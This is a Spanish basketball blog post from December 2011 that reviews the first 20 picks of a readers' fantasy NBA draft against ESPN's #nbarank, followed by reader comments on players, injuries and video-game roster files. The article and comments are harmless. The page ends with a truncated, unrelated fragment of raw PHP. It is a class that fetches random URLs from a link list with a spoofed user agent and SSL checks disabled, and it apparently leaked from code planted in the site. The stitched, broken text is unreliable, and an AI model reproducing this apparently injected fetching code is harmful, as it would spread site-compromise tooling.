Aproximación imaginaria al #tjnbarank

17 de December de 2011 por TheDeerHunter

Por si no teníamos poco material y poco trabajo esta última semana, nos disponemos a revisar un artículo que escribímos hace ya casi un mes, en medio del hastío “lockoutero”. Se trata de aquellos comentarios que hacíamos sobre el #nbarank de la ESPN que tanta controversia había generado y que nos animaba a efectuar nuestro particular #tjnbarank que no llegamos a concretar (entre otras cosas porque por fin se ha reanudado la liga).

El motivo con el que me dispongo a revisarlo es que, como muchos sabéis, montamos recientemente una liga fantasy NBA exclusivamente formada por gente vinculada al blog. 26 visitantes, miembros del staff y/o foreros internos que tratamos de batirnos con plantillas que tratamos de diseñar virtualmente lo mejor que podamos, eligiendo con la premisa de ganar este año con un equipo recién creado. Un draft de esta forma definido en la teoría sería comparable a un hipotético #tjnbarank votado por todos. Sin embargo el resultado es curioso. Voy a exponer la primera ronda al universo para que la comentemos todos (omitiendo nombres para no sacar las vergüenzas a la palestra).

Pick#1: LeBron James.- Poco que decir. Coincide con el #nbarank y como ya decíamos te puede caer mejor o peor pero en una liga de estas características sería número 1 prácticamente siempre. No hemos sido excepción y es el puesto ocupado en la inmensa mayoría de drafts que me haya tirado a la cara.

Pick#2: Dwight Howard.- También poco que decir. También coincide con su puesto en la ESPN. Añado que es el único que he visto birlar algún pick#1 al anterior. También quiero puntualizar que los cambios que se avecinan en su carrera bien podrían alterar su rendimiento en algún sentido, aunque sus cualidades siempre son una garantía.

Pick#3: Kevin Durant (6ºESPN).- Causa furor en el medio y, sorprendentemente (al menos para mí) supera a Howard en promedios de elección. Diría que la marabunta prevé todavía más progresión que la que ya ha ido acumulando estos años y que los Thunder van a explotar este año. No diré que no pueda suceder y parece una decisión valiente, pero las características de anotación de esta Fantasy League (que ponderan especialmente bien asistencias y robos, penalizando tiros intentados) no le benefician del todo.

Pick#4: Kevin Love (16ºESPN).- Se trata de lo que yo llamo un “mostrenco fantasy”. Para mí quizás es el más extremo en la comparativa frente a la aportación real (no en vano tiene cierta fama quizás un poco injusta de “hacenúmeros”) y personalmente creía iba a ser el tercero en discordia en una liga como esta. A mí personalmente me encanta, pero ni harto de pastillas de colores lo elegiría en un top5 puesto en la realidad.

Pick#5: Deron Williams (9ºESPN).- Curiosa elección. Debo explicar al respetable que el sistema de puntuación de nuestra liga le va muy bien pero esto no explica totalmente que haya salido tan “arriba”. A diferencia de los anteriores picks él no está entre los 10 máximos elegidos universalmente. El GM que le ha elegido debe de apostar por un gran año de firma buscando llenar su cazo.

Pick#6: Dwayne Wade  (3ºESPN).- Dije en su día que no me parece un top 3 y me costaba tenerle como un top 5. Creo que tal elección en este contexto es correcta.

Pick #7: Con todos vosotros JODIE MEEEKS!!! .- Efectivamente. Aún no sabemos si se trata de alguna broma o algún error de quién sabe qué tipo. El pick más celebrado/comentado de primera ronda… y quien sabe si el acierto (o metida de gamba) más reseñable de la historia de TJNBA. ¿Pero y lo que nos hemos reído?

Pick #8: Chris Paul (4ºESPN).- Con la puntuación en uso también sale beneficiado. Personalmente le hubiera elegido a él por delante de Deron, pero es cuestión de matices y gustos. Aunque también se avecina una temporada de inestabilidad para él es una elección fantástica para un pick tan bajo.

Pick #9: Zach Randolph (20ºESPN).- Ya dije, y eso que no es santo de mi devoción, que era el gran maltratado del #nbarank y uno de los más infravalorados de los últimos tiempos en la liga. Le situaba en el top10 del último año aunque no sabría decir si tanto como para desbancar a varios de los que le siguen a continuación. De todas formas, puesto arriba, puesto abajo me parece una elección valiente y esencialmente correcta.

Pick #10: Derrick Williams.- Otra de las sorpresas de nuestra primera ronda. O se trata de un acierto casi visionario o es columpiada al gusto de cada uno.

Pick #11: Blake Griffin (10ºESPN).- Lo califiqué de columpiada padre en la ESPN y teniendo en cuenta que por delante anda Meeks comparativamente clavamos la posición. Sin embargo en este contexto le pasa un poco como Love y sale muy bien en la foto de los números. En la realidad tampoco se me ocurriría elegirle en estos puestos.

Pick #12: Derrick Rose (8ºESPN).- Elección del orden de la #nbarank que, con algunos matices, me parece justa. El personal rara vez le tiene en tan alta consideración, aunque en el resto de ligas es un top 10 bastante habitual.

Pick #13: Pau Gasol  (11ºESPN).- Sus números siempre son una garantía, con la diferencia en que suelen traducirse en la realidad a efectos que van mucho más allá. Esencialmente es una elección similar al del #nbarank y, salvo catástrofe por todo lo que le envuelve últimamente, me parece una elección justa.

Pick #14: Kobe Bryant  (7ºESPN).- Si se le puso al #nbarank a caer de un burro por una elección tan baja qué dirían si nos miran a nosotros. Para mí es el gran robo de nuestra primera ronda. Aunque eso sí, como en el caso de Durant, nuestro sistema de puntuación no le beneficia y, en su caso, el potencial tampoco.

Pick #15: Al Horford.- Este caso es especial pues se trataba de un pick automático calculado bajo la perspectiva de la eficiencia del año pasado en la regular. Nada que comentar. No es representativo.

Pick #16: Carmelo Anthony  (12ºESPN).- Dije sobre el #nbarank que un top 15 este año era excesivo premio para él. Sin embargo aquí yo lo hubiera elegido como mínimo en ese tramo. Buen robo.

Pick #17: Dirk Nowitzki  (7ºESPN).-  Hoy en día ya no es un top 10 en este tipo de ligas y tampoco sabemos como va a afrontar la regular pero de ahí a caer tan bajo no parece demasiado justo. El alemán hasta la fecha siempre ha sido una garantía.

Pick #18: John Wall.- Otra apuesta audaz. Para mí excesivamente alta aunque números hace y sus características pueden sorprender en este contexto.

Pick #19: Amare Stoudemire (13ºESPN).-  Se trata de otro “monstrenco fantasy” en gran parte gracias a su último año. El sistema de juego de los Knicks y que aquí no le vamos a exigir defender debería haber bastado para aparecer 10 puestos más arriba. Robazo importante también. Parece que no le tenemos en demasiada estima en TJNBA.

Pick #20: Tyreke Evans: Jugada un tanto arriesgada, pero sus cualidades pueden justificar la sorpresa si la salud le respeta este año.

Estos serían nuestros 20 primeros. Bastante curioso, ¿no?

Comenta

37 comentarios a esta entrada

  1. Blade Petrovic dice:
    #1

    Fui yo el pick 7(me van a caer mas burlas)
    Me parece qe me voi a hacer manager de meeks para q se espavile.
    Esta temporada llega a los 20 ppp
    PD: si alguien qiere a ricky q lo digo q se lo doi

      Citar

  2. infante dice:
    #2

    Bueno, antes de empezar ya tengo la satisfacion de llevarme el mayor robo del draft XD

      Citar

  3. Denise dice:
    #3

    Las elecciones de nuestro Draft se hacen tambien en funcion del sistema de puntuacion. En cierto modo, no es comparable con la realidad. Por ejemplo, realmente Howard tiene muchos mas intangibles (defensa, intmidacion y rectificacion de tiros en el rival) que Durant, Lebron o Rose, pero en nuestro draft yo habría elegido a estos 3 por delante de Howard.

    Me sorprendió lo bajo que cayó Rose y Nowitzki.
    Y Derrick Williams, Wall y Tyreke Evans a priori en mi opinión eran jugadores de segunda o tercera ronda.

      Citar

  4. melo15 dice:
    #4

    Para mi la mayoria de las elecciones han bien un poco baja la de bryant un poco alta la de pau (para mi es mejor stat) yo en vez de a evan cogia a ellis o a westbrook pero bueno tengo unas ganas de que empiece la liga

      Citar

  5. melo15 dice:
    #5

    Como funciona eso del toys??

      Citar

  6. Marcaco dice:
    #6

    oh.. no me enteré de la liga fantasy esta T_T

      Citar

  7. Nacho dice:
    #7

    ¡Aviso a navegantes!
    Al que vuelva a decir en un comentario que Stat es mejor que Pau le mando a la tuna a casa hasta que le salgan clavelitos de las orejas.
    Por todo lo demás nada que decir, no entiendo el juego ni estoy apuntado.
    ¿Cuándo coño es día 25?
    Saludos

      Citar

  8. Txusma dice:
    #8

    Creo que el 25 cae por Navidad… 😉

      Citar

  9. The wolf dice:
    #9

    noticia triste de ultima hora…jeff green se sometera a cirugia cardiovascular el lunes… Diagnostico: aneurisma aórtico.

      Citar

  10. melo15 dice:
    #10

    Cuanto tiempo estara de baja?

      Citar

  11. melo15 dice:
    #11

    Stat es mejor que pau

      Citar

  12. Cocinitas dice:
    #12

    Una pena no haberme enterado antes de la liga. A mi quien me parece que deberia estar en el Top 20 es Rondo.

      Citar

  13. Denise dice:
    #13

    Rondo esta en el pick 26, uno por detrás de Nash y uno por delante de Bosh

      Citar

  14. sayim dice:
    #14

    Pau es un futuro HOF y ganador de todo lo ganable (JJOO?). Stat es un buen jugador ofensivamente, con cierta tendencia a esconderse en los momentos importantes y sin aptitudes ni actitudes defensivas de ningún tipo, que por cierto será all star sus 7 u 8 veces. Pau entiende el juego e intenta darle a su equipo lo que necesita en cada momento, amare piensa durante el partido cuanto le falta para los 20 puntos.

    En mi humilde opinión como deportistas no se pueden comparar.

      Citar

  15. The wolf dice:
    #15

    melo15:
    Cuanto tiempo estara de baja?

    esta temporada entera seguro…despues…quien sabe

      Citar

  16. Denise dice:
    #16

    Amare es una bestia gracias a su fisico pero ni en 1000 vidas tendrá la calidad, muñeca, recursos ofensivos, defensa, vision de juego y lectura del partido del catalan.

      Citar

  17. Nacho dice:
    #17

    Gracias Sayim, gracias Denise. Yo no sabría decirlo mejor, solo me salía sacar a la tuna a torturar.
    Por cierto, Ricky 6/6/7 (p,r,a) más dos robos en 24 minutos.

      Citar

  18. melo15 dice:
    #18

    Pobre gree y pobres celtics

      Citar

  19. The wolf dice:
    #19

    Nacho:
    Gracias Sayim, gracias Denise. Yo no sabría decirlo mejor, solo me salía sacar a la tuna a torturar.
    Por cierto, Ricky 6/6/7 (p,r,a) más dos robos en 24 minutos.

    resumen de ricky ayer haciendo “cositas”

      Citar

  20. The wolf dice:
    #20

    PD. se me olvido poner el video en el comentario anterior

    http://www.canalplus.es/play/video.html?xref=20111218plucandep_1.Ves

      Citar

  21. Denise dice:
    #21

    Siempre he pensado que en la NBA es mucho mas facil anotar, rebotear, asistir y hacer estadisticas en general que en Europa. Y mas para un jugador con sus caracteristicas, totalmente nulo en estatico pero bastante bueno en contraataque.

    PD: Que malo es el narrador por Dios. (el del video de arriba)

      Citar

  22. Nacho dice:
    #22

    Bueno, tanto como totalmente nulo en estático… necesita mejorar, pero esta es una liga que le va que ni pintada, y el equipo, pues también. Eso es cierto. Y una cosa está clara, es un espectáculo verlo defender y contratacar.

      Citar

  23. Jose Luis dice:
    #23

    Dan ganas de jugar con los rookies estos hombre. ¿Nadie sabe aún como puedo descargarme la clase de draft de este año al NBA2K11 no? Los servidores están, pero no hay archivos para descargar, solo las plantillas, actualizadas a 9 de junio (sin el draft vamos).

    ¡¡Quiero jugar con los rookies!!

      Citar

  24. Txusma dice:
    #24

    Jose Luis:
    Dan ganas de jugar con los rookies estos hombre. ¿Nadie sabe aún como puedo descargarme la clase de draft de este año al NBA2K11 no? Los servidores están, pero no hay archivos para descargar, solo las plantillas, actualizadas a 9 de junio (sin el draft vamos).

    ¡¡Quiero jugar con los rookies!!

    Yo justo ayer, me descargué unas plantillas actualizadas creo que a 20 de noviembre con todos los rookies y los movimientos hasta ese día. Incluso empecé a actualizar las plantillas. Es para PS3, si alguien más está interesado miro de acabarlo y subir el archivo.

      Citar

  25. Txusma dice:
    #25

    The wolf:
    PD. se me olvido poner el video en el comentario anterior

    http://www.canalplus.es/play/video.html?xref=20111218plucandep_1.Ves

    A mi lo de Ricky me da buen pálpito…

      Citar

  26. Sancho88 dice:
    #26

    Txusma: a

    No parece el mismo macho. Se parece realmente al Ricky de la Penya, no al del Barsa. Brindemos por ello no?

      Citar

  27. HisRoyalAirness dice:
    #27

    melo15: Aproximación

    NO

    ni lo voy a argumentar

      Citar

  28. Denise dice:
    #28

    Txusma: A mi lo de Ricky me da buen pálpito…

    Espero que no triunfe y le robe protagonismo a Barea, que el puertoriqueño es mi base en el equipazo que me he montado en la Liga Hoops

      Citar

  29. Jose Luis dice:
    #29

    @Txusma

    Yo es que lo tengo para XBOX, intentaré mirarlo a ver si lo han puesto nuevo. Es que es una pena no tenerlo, y no voy a comprarme el 2K12 porque me parece poco mejorable el 11, como vosotros mismos habéis dicho. ¿Ese archivo se puede subir, y yo abrirlo en el ordenador, aunque sea para crear los jugadores copiando los puntos o algo parecido? Perdón si la pregunta es tonta, pero no tengo ni idea 🙂

    Gracias de todas formas!

      Citar

  30. Vader dice:
    #30

    Baron Davis a los Knicks, ya tenemos base. Ahora suena Arenas, veremos…

    Saludos

      Citar

  31. Sancho88 dice:
    #31

    entonces shumpert no va a jugar na? ale, fichajazo que me he hexo en la hoops… jajaaj

      Citar

  32. HisRoyalAirness dice:
    #32

    qué rabia, cuando montásteis la liga estaba de viaje y no me enteré.
    vais a estar todo el año dándome envidia!

      Citar

  33. Vader dice:
    #33

    Sancho88:
    entonces shumpert no va a jugar na? ale, fichajazo que me he hexo en la hoops… jajaaj

    Claro que jugara, es más, esta dando buena impresión los primeros dias. Tiene que ser el especialista defensiva en perimetro. Dicen que es uno de los mejores defensors de este draft.

    El caso es que de point-guard sólo tenemos a Bibby y T.Douglas que es más un 2. Si viniera Arenas lo veo más como sexto-hombre para jugar de 1 o 2 y dar anotación cuando Carmelo descansa o hay que remontar.

    Fichar a los dos sería la hostia pero de momento si se confirma Davids ya me parece genial para los Knicks que les queda un quinteto muy apañado 😀

    Saludos

    P.D: Si somos muchos que nos hemos quedado fuera podriamos mirar de montar otra liga…

      Citar

  34. Txusma dice:
    #34

    Jose Luis:
    @Txusma

    Yo es que lo tengo para XBOX, intentaré mirarlo a ver si lo han puesto nuevo. Es que es una pena no tenerlo, y no voy a comprarme el 2K12 porque me parece poco mejorable el 11, como vosotros mismos habéis dicho. ¿Ese archivo se puede subir, y yo abrirlo en el ordenador, aunque sea para crear los jugadores copiando los puntos o algo parecido? Perdón si la pregunta es tonta, pero no tengo ni idea

    Gracias de todas formas!

    Pues la verdad es q no se si se puede actualizar en el ordenador. Yo lo hago todo con la PS3. No creo que cambie ninguna puntuación pero al menos que los jugadores aparezcan en sus nuevos equipos. Y a pillar a los Clippers claro… 😀

      Citar

  35. HisRoyalAirness dice:
    #35

    Vader: Claro que jugara, es más, esta dando buena impresión los primeros dias. Tiene que ser el especialista defensiva en perimetro. Dicen que es uno de los mejores defensors de este draft.

    El caso es que de point-guard sólo tenemos a Bibby y T.Douglas que es más un 2. Si viniera Arenas lo veo más como sexto-hombre para jugar de 1 o 2 y dar anotación cuando Carmelo descansa o hay que remontar.

    Fichar a los dos sería la hostia pero de momento si se confirma Davids ya me parece genial para los Knicks que les queda un quinteto muy apañado

    Saludos

    P.D: Si somos muchos que nos hemos quedado fuera podriamos mirar de montar otra liga…

    Yo creo que Baron Davis es titularísimo en NY pero vamos, si soy yo D´Antoni no tendría ninguna duda. Bibby es una caricatura de un jugador de baloncesto y Douglas en fin…

      Citar

  36. Vader dice:
    #36

    HisRoyalAirness: Yo creo que Baron Davis es titularísimo en NY pero vamos, si soy yo D´Antoni no tendría ninguna duda. Bibby es una caricatura de un jugador de baloncesto y Douglas en fin…

    100% agree. Baron Davis al 60% es un gran fichaje para los Knicks… y como se le ocurra volver por sus fueros ojito…

      Citar

  37. rumbero dice:
    #37

    Vader: 100% agree. Baron Davis al 60% es un gran fichaje para los Knicks… y como se le ocurra volver por sus fueros ojito…

    Ahí está el tema. Con Davis motivado les queda a los Knicks un equipito la mar de apañado

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>